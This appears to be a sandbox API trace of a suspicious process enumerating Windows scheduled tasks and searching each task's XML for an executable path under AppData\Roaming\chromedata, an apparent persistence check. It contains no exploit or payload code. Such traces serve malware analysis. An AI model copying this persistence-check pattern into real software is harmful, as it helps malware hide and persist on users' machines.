	[0098.772] IRegisteredTask:get_Xml (in: This=0x63ff60, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator</URI>\r\n    <Source>$(@%systemRoot%\\system32\\wsqmcons.exe,-106)</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>$(@%systemRoot%\\system32\\wsqmcons.exe,-107)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2004-01-02T00:00:00</StartBoundary>\r\n      <Repetition>\r\n        <Interval>PT19H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"WinSQMAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"WinSQMAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\wsqmcons.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.775] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\Consolidator</URI>\r\n    <Source>$(@%systemRoot%\\system32\\wsqmcons.exe,-106)</Source>\r\n    <Author>Microsoft Corporation</Author>\r\n    <Description>$(@%systemRoot%\\system32\\wsqmcons.exe,-107)</Description>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger>\r\n      <StartBoundary>2004-01-02T00:00:00</StartBoundary>\r\n      <Repetition>\r\n        <Interval>PT19H</Interval>\r\n      </Repetition>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <Enabled>false</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"WinSQMAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"WinSQMAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\System32\\wsqmcons.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.799] IUnknown:Release (This=0x63ff60) returned 0x0
	[0098.799] IRegisteredTaskCollection:get_Item (in: This=0x63fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x2, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff60) returned 0x0
	[0098.800] IRegisteredTask:get_Name (in: This=0x63ff60, pName=0x128e3c | out: pName=0x128e3c*="KernelCeipTask") returned 0x0
	[0098.800] IRegisteredTask:get_Xml (in: This=0x63ff60, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\kernelceip.dll,-600)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\kernelceip.dll,-601)</Source>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask</URI>\r\n    <Description>$(@%SystemRoot%\\system32\\kernelceip.dll,-602)</Description>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-09-01T03:30:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Thursday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT17H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RequiredPrivileges>\r\n        <Privilege>SeChangeNotifyPrivilege</Privilege>\r\n      </RequiredPrivileges>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{e7ed314f-2816-4c26-aeb5-54a34d02404c}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.803] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%SystemRoot%\\system32\\kernelceip.dll,-600)</Author>\r\n    <Source>$(@%SystemRoot%\\system32\\kernelceip.dll,-601)</Source>\r\n    <URI>\\Microsoft\\Windows\\Customer Experience Improvement Program\\KernelCeipTask</URI>\r\n    <Description>$(@%SystemRoot%\\system32\\kernelceip.dll,-602)</Description>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;LS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-09-01T03:30:00</StartBoundary>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Thursday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>PT17H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n    </IdleSettings>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RequiredPrivileges>\r\n        <Privilege>SeChangeNotifyPrivilege</Privilege>\r\n      </RequiredPrivileges>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{e7ed314f-2816-4c26-aeb5-54a34d02404c}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.835] IUnknown:Release (This=0x63ff60) returned 0x0
	[0098.835] IRegisteredTaskCollection:get_Item (in: This=0x63fec0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x3, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff60) returned 0x0
	[0098.835] IRegisteredTask:get_Name (in: This=0x63ff60, pName=0x128e3c | out: pName=0x128e3c*="UsbCeip") returned 0x0
	[0098.835] IRegisteredTask:get_Xml (in: This=0x63ff60, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%SystemRoot%\\system32\\usbceip.dll,-601)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\usbceip.dll,-600)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\usbceip.dll,-602)</Description>\r\n    <URI>Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip</URI>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-04-25T01:30:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>3</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.838] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%SystemRoot%\\system32\\usbceip.dll,-601)</Source>\r\n    <Author>$(@%SystemRoot%\\system32\\usbceip.dll,-600)</Author>\r\n    <Description>$(@%SystemRoot%\\system32\\usbceip.dll,-602)</Description>\r\n    <URI>Microsoft\\Windows\\Customer Experience Improvement Program\\UsbCeip</URI>\r\n    <SecurityDescriptor>D:(A;OICI;FA;;;BA)(A;OICI;FA;;;SY)(A;OICI;GRGX;;;AU)(A;OICI;SD;;;S-1-5-87-1060603329-121822201-3452730971-4292368946-61207722)</SecurityDescriptor>\r\n    <Version>1.0</Version>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2008-04-25T01:30:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByDay>\r\n        <DaysInterval>3</DaysInterval>\r\n      </ScheduleByDay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <RestartOnFailure>\r\n      <Interval>PT45M</Interval>\r\n      <Count>1</Count>\r\n    </RestartOnFailure>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalService\">\r\n      <UserId>S-1-5-19</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalService\">\r\n    <ComHandler>\r\n      <ClassId>{c27f6b1d-fe0b-45e4-9257-38799fa69bc8}</ClassId>\r\n      <Data><![CDATA[SYSTEM]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.867] IUnknown:Release (This=0x63ff60) returned 0x0
	[0098.867] IUnknown:Release (This=0x63fec0) returned 0x0
	[0098.867] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fec0) returned 0x0
	[0098.868] ITaskFolderCollection:get_Count (in: This=0x63fec0, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.868] IUnknown:Release (This=0x63fec0) returned 0x0
	[0098.868] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.868] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x8, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.868] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe80) returned 0x0
	[0098.870] IRegisteredTaskCollection:get_Count (in: This=0x63fe80, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0098.870] IRegisteredTaskCollection:get_Item (in: This=0x63fe80, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff68) returned 0x0
	[0098.870] IRegisteredTask:get_Name (in: This=0x63ff68, pName=0x128e3c | out: pName=0x128e3c*="ScheduledDefrag") returned 0x0
	[0098.870] IRegisteredTask:get_Xml (in: This=0x63ff68, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\defragsvc.dll,-800)</Source>\r\n    <Author>$(@%systemroot%\\system32\\defragsvc.dll,-801)</Author>\r\n    <Description>$(@%systemroot%\\system32\\defragsvc.dll,-802)</Description>\r\n    <URI>Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"DefragWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Wednesday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n      <RandomDelay>PT2H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>P7D</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\defrag.exe</Command>\r\n      <Arguments>-c</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.873] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemroot%\\system32\\defragsvc.dll,-800)</Source>\r\n    <Author>$(@%systemroot%\\system32\\defragsvc.dll,-801)</Author>\r\n    <Description>$(@%systemroot%\\system32\\defragsvc.dll,-802)</Description>\r\n    <URI>Microsoft\\Windows\\Defrag\\ScheduledDefrag</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger id=\"DefragWeeklyTrigger\">\r\n      <StartBoundary>2005-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Wednesday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n      <RandomDelay>PT2H</RandomDelay>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT3M</Duration>\r\n      <WaitTimeout>P7D</WaitTimeout>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>true</RestartOnIdle>\r\n    </IdleSettings>\r\n    <Enabled>true</Enabled>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <Hidden>false</Hidden>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"LocalSystem\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"LocalSystem\">\r\n    <Exec>\r\n      <Command>%windir%\\system32\\defrag.exe</Command>\r\n      <Arguments>-c</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.912] IUnknown:Release (This=0x63ff68) returned 0x0
	[0098.912] IUnknown:Release (This=0x63fe80) returned 0x0
	[0098.912] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe80) returned 0x0
	[0098.914] ITaskFolderCollection:get_Count (in: This=0x63fe80, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.914] IUnknown:Release (This=0x63fe80) returned 0x0
	[0098.914] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
	[0098.914] ITaskFolderCollection:get_Item (in: This=0x63fd30, index=0x128e4c*(varType=0x3, wReserved1=0x0, wReserved2=0x1, wReserved3=0x0, varVal1=0x9, varVal2=0x76fa8cd5), ppFolder=0x128f6c | out: ppFolder=0x128f6c*=0x63fe10) returned 0x0
	[0098.914] ITaskFolder:GetTasks (in: This=0x63fe10, flags=1, ppTasks=0x128e40 | out: ppTasks=0x128e40*=0x63fe88) returned 0x0
	[0098.915] IRegisteredTaskCollection:get_Count (in: This=0x63fe88, pCount=0x128e30 | out: pCount=0x128e30*=1) returned 0x0
	[0098.915] IRegisteredTaskCollection:get_Item (in: This=0x63fe88, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe10, wReserved3=0x63, varVal1=0x1, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x63ff70) returned 0x0
	[0098.916] IRegisteredTask:get_Name (in: This=0x63ff70, pName=0x128e3c | out: pName=0x128e3c*="Scheduled") returned 0x0
	[0098.916] IRegisteredTask:get_Xml (in: This=0x63ff70, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\sdiagschd.dll,-101)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sdiagschd.dll,-102)</Source>\r\n    <Description>$(@%systemroot%\\system32\\sdiagschd.dll,-103)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Diagnosis\\Scheduled</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT8H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{c1f85ef8-bcc2-4606-bb39-70c523715eb3}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.919] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Author>$(@%systemroot%\\system32\\sdiagschd.dll,-101)</Author>\r\n    <Version>1.0</Version>\r\n    <Source>$(@%systemroot%\\system32\\sdiagschd.dll,-102)</Source>\r\n    <Description>$(@%systemroot%\\system32\\sdiagschd.dll,-103)</Description>\r\n    <SecurityDescriptor>O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;BU)</SecurityDescriptor>\r\n    <URI>\\Microsoft\\Windows\\Diagnosis\\Scheduled</URI>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <CalendarTrigger>\r\n      <StartBoundary>2004-01-01T01:00:00</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n      <ScheduleByWeek>\r\n        <DaysOfWeek>\r\n          <Sunday />\r\n        </DaysOfWeek>\r\n        <WeeksInterval>1</WeeksInterval>\r\n      </ScheduleByWeek>\r\n    </CalendarTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Users\">\r\n      <GroupId>S-1-5-4</GroupId>\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <IdleSettings>\r\n      <Duration>PT10M</Duration>\r\n      <WaitTimeout>PT8H</WaitTimeout>\r\n      <StopOnIdleEnd>false</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>true</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <Priority>7</Priority>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Actions Context=\"Users\">\r\n    <ComHandler>\r\n      <ClassId>{c1f85ef8-bcc2-4606-bb39-70c523715eb3}</ClassId>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0098.951] IUnknown:Release (This=0x63ff70) returned 0x0
	[0098.951] IUnknown:Release (This=0x63fe88) returned 0x0
	[0098.951] ITaskFolder:GetFolders (in: This=0x63fe10, flags=0, ppFolders=0x128e34 | out: ppFolders=0x128e34*=0x63fe88) returned 0x0
	[0098.953] ITaskFolderCollection:get_Count (in: This=0x63fe88, pCount=0x128e2c | out: pCount=0x128e2c*=0) returned 0x0
	[0098.953] IUnknown:Release (This=0x63fe88) returned 0x0
	[0098.953] TaskScheduler:IUnknown:Release (This=0x63fe10) returned 0x0
